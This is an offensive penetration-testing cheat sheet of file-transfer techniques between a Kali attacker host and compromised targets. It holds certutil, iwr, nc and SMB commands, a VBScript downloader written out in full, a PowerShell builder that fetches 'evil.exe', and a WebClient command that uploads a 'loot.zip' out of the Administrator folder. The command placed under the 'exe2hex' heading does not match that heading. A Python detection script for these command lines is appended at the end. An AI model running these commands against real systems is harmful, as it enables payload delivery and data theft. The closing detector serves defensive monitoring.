Python server

  • From kali: python3 -m http.server $port
  • From target Windows:
    • powershell: iwr -uri http://$kaliIP:$port/$file -o $file
    • cmd: certutil.exe -urlcache -split -f http://$kaliIP:$port/$file C:\Windows\temp\$file
  • From target Linux:
    • wget http://$kaliIP:$port/$file

nc

  1. on target - nc -w 3 $kaliIP 4444 < file.txt
  2. on kali (start this listener before running step 1) - nc -lvnp 4444 > file.txt

SMB

  • From kali:
    • sudo impacket-smbserver -smb2support $shareName $sharedDirectory -username "$kaliUser" -password "$kaliPass"
  • From target:
    • net use m: \\$kaliIP\$shareName /user:$kaliUser $kaliPass
    • copy/get $file m:\
  • Example:
    1. on kali - sudo impacket-smbserver -smb2support share . -username "pop" -password "party1"
    2. on target - net use \\$kaliIP\share /user:pop party1
    3. on target - copy $file \\$kaliIP\share

Over RDP

  • xfreerdp /u:admin /p:password /v:$target /drive:/$directoryToShare,$nameToShare /dynamic-resolution
  • xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/.

SSH/SCP

scp -P $sshPort $file $user@$targetIP:$destFolder

FTP

  • From Kali: python -m pyftpdlib -p 21 --write (to provide write access)
  • From Windows: ftp $kaliIP (anonymous:anonymous)

wsgidav

wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root $directoryToShare

  • “--host” specifies the address to listen on (“0.0.0.0” means all interfaces), “--auth=anonymous” disables authentication (fine for sharing specific files during this context), and the “--root” flag specifies the directory to share.

.vbs file

Downloads a file from a self hosted web server:

echo strUrl = WScript.Arguments.Item(0) > wget.vbs 
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 
echo  Err.Clear >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 
echo  If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 
echo  http.Open "GET", strURL, False >> wget.vbs 
echo  http.Send >> wget.vbs 
echo  varByteArray = http.ResponseBody >> wget.vbs 
echo  Set http = Nothing >> wget.vbs 
echo  Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 
echo  Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 
echo  strData = "" >> wget.vbs 
echo  strBuffer = "" >> wget.vbs 
echo  For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 
echo  ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 
echo  Next >> wget.vbs 
echo  ts.Close >> wget.vbs

SAMPLE USAGE: `cscript wget.vbs http://$kaliIP/evil.exe evil.exe`

Powershell script builder

echo $webclient = New-Object System.Net.WebClient >>wget.ps1 
echo $url = "http://[IP]/evil.exe" >>wget.ps1 
echo $file = "new-exploit.exe" >>wget.ps1 
echo $webclient.DownloadFile($url,$file) >>wget.ps1

Usage:

  • powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
  • powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://$kaliIP/winPEAS.bat', 'winpeas.bat')

exe2hex

exe2hex converts an executable to a script that recreates the file from a hex string via non-interactive methods:

powershell.exe (New-Object System.Net.WebClient).UploadFile('http://$kaliIP/20220204195540_loot.zip', 'C:\Users\Administrator\loot.zip')
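
On the monitoring side, the Windows transfer commands on this page (certutil -urlcache, iwr, WebClient DownloadFile/UploadFile, cscript wget.vbs, the -ExecutionPolicy Bypass launcher, net use with inline credentials) leave distinctive process command lines. The following is an added example, not part of the original notes: it matches those forms against process-creation events. The rule names, the event layout and all sample events are assumptions constructed for illustration.

```python
import re

# Patterns for the Windows-side transfer commands listed on this page.
# Rule names are hypothetical labels chosen for this example.
RULES = {
    "certutil_urlcache": r"\bcertutil(\.exe)?\b.*[-/]urlcache\b.*https?://",
    "powershell_iwr": r"\b(iwr|invoke-webrequest)\b.*https?://",
    "webclient_transfer": r"net\.webclient\b.*\.(downloadfile|uploadfile)\s*\(",
    "cscript_http_arg": r"\bcscript(\.exe)?\s+\S+\.vbs\s+https?://",
    "ps_policy_bypass": r"\bpowershell(\.exe)?\b.*-executionpolicy\s+bypass\b.*-file\s+\S+\.ps1",
    "net_use_inline_creds": r"\bnet\s+use\b.*\\\\\S+\s+/user:\S+\s+\S+",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

# Constructed process-creation events (not real logs).
# 192.0.2.10 is a documentation address; hosts and file names are made up.
SAMPLE_EVENTS = [
    ("WS01", r"certutil.exe -urlcache -split -f http://192.0.2.10/tool.exe C:\Windows\temp\tool.exe"),
    ("WS01", r"powershell iwr -uri http://192.0.2.10:8000/tool.exe -o tool.exe"),
    ("WS02", r"cscript wget.vbs http://192.0.2.10/tool.exe tool.exe"),
    ("WS02", r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"),
    ("WS03", r"powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.0.2.10/a.bat', 'a.bat')"),
    ("WS03", r"net use \\192.0.2.10\share /user:svc Example123"),
    ("WS04", r"certutil.exe -hashfile C:\Users\a\report.pdf SHA256"),  # benign
    ("WS04", r"net use \\fileserver\public"),  # benign: no inline credentials
]


def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(cmdline))


def scan(events):
    """Return (host, rule names) for each event that matches at least one rule."""
    hits = []
    for host, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.append((host, matched))
    return hits


if __name__ == "__main__":
    for host, matched in scan(SAMPLE_EVENTS):
        print(host, ", ".join(matched))
```

The patterns cover only the command forms shown on this page; abbreviated or reordered flags need their own rules.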